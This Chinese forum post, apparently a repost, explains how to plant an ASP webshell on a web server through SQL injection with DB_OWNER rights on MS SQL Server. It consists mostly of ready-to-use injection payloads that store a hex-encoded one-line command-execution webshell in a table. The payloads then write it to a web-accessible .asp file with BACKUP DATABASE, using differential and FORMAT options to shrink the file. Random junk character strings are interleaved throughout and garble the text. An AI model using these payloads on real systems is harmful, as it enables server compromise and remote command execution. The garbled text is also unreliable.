DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
2 T2 [. @0 x9 R  G! p
4 y0 ?& o8 ?, q5 X5 [减少备份文件大小，得到可执行的webshell成功率提高不少
8 r" G6 R: f' ^+ K1 y# N4 H一利用差异备份
加一个参数WITH DIFFERENTIAL

1
7 A8 R) M8 @. H7 P" x2
" d. u: u4 ~. B& X. P9 E, E3
7 [! `$ M, v% @  W6 |/ j( u! @1 c* S7 r4
7 h: u$ ^- f1 T; S, Y6 n9 A declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
8 }1 l" R; y1 v2 c; Uinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* I+ M) S2 ?6 y7 `' xdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
$ i# g1 {( Y3 w. U
二利用完全FORMAT
加一个参数WITH FROMAT
2 t3 ]  i* L8 C  B有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
$ b5 g" C  G3 H+ x3 R4 l
& z  r: |7 K& j5 X; c9 I1
2
  Z8 w: a& a$ p' \3 M$ ~0 E5 S1 X7 s3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
  a$ s" R  R0 |4 m; C9 Pcreate table [dbo].[xiaolu] ([cmd] [image]);
' ]. ^* F% [2 x0 P- |( Ginsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
0 [5 z: l# k& M8 u6 F8 `declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

8 A$ x! F6 j1 r总的来说就是那么简单几句,下面以备份数据库model为例子
1
1 `: P$ k- C4 ~8 N8 |) c5 k% E
1
2 j! b- \) `* j) R% T. c" }3 V id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

2

1
id=1;backup database model to disk='你的路径‘ with differential,format;--